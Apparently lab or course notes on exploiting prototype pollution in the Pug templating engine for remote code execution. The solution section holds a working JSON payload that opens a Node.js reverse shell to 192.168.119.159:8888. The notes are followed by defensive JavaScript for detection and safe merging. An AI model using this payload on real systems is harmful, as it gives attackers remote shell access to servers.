14.5.2
Switch the Templating Engine to Pug and discover a path to RCE.
Solution
- Search for a value that can be overridden and is not predefined (ast.block in this case).
if[ ]+\([a-zA-Z]+\.[a-zA-Z]+\)[ ]+\{ -> Regex
"__proto__":{"block": {"type":"Text","line":"net = global.process.mainModule.require('net'), sh = global.process.mainModule.require('child_process').exec('/bin/bash'), client = new net.Socket(), client.connect(8888, '192.168.119.159', function() {client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client);})"}}
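
The defensive side of the same issue, as an added example that is not part of the original notes: it reuses the regex above to flag bare truthiness checks during code review, reports prototype-related keys in a parsed JSON body, and shows a merge and an own-property check that ignore them. All function names are hypothetical and the sample body is constructed.

```javascript
'use strict';
// Added example: names are hypothetical, sample inputs are constructed.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);

// Audit: line numbers in `source` matching the page's regex, i.e. bare
// truthiness checks such as `if (ast.block) {` that also see inherited keys.
const BARE_CHECK = /if[ ]+\([a-zA-Z]+\.[a-zA-Z]+\)[ ]+\{/;
function findBareChecks(source) {
  return source.split('\n')
    .map((text, i) => (BARE_CHECK.test(text) ? i + 1 : 0))
    .filter(Boolean);
}

// Detection: paths of prototype-related keys in an already parsed JSON body.
function findPollutionKeys(value, path = '$', hits = []) {
  if (value === null || typeof value !== 'object') return hits;
  for (const key of Object.keys(value)) {
    if (FORBIDDEN.has(key)) hits.push(`${path}.${key}`);
    findPollutionKeys(value[key], `${path}.${key}`, hits);
  }
  return hits;
}

// Mitigation 1: merge that copies own keys only and skips forbidden ones.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN.has(key)) continue;
    const val = source[key];
    if (val !== null && typeof val === 'object' && !Array.isArray(val)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || target[key] === null || typeof target[key] !== 'object') {
        target[key] = {};
      }
      safeMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Mitigation 2: own-property test to use in place of `if (node.block)`.
function hasOwnBlock(node) {
  return Object.prototype.hasOwnProperty.call(node, 'block');
}

// Constructed request body with the same shape as the one on the page.
const body = JSON.parse('{"name":"a","__proto__":{"block":{"type":"Text"}}}');
console.log(findPollutionKeys(body));   // paths to reject or alert on
console.log(safeMerge({}, body));       // merged object without the key
```
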
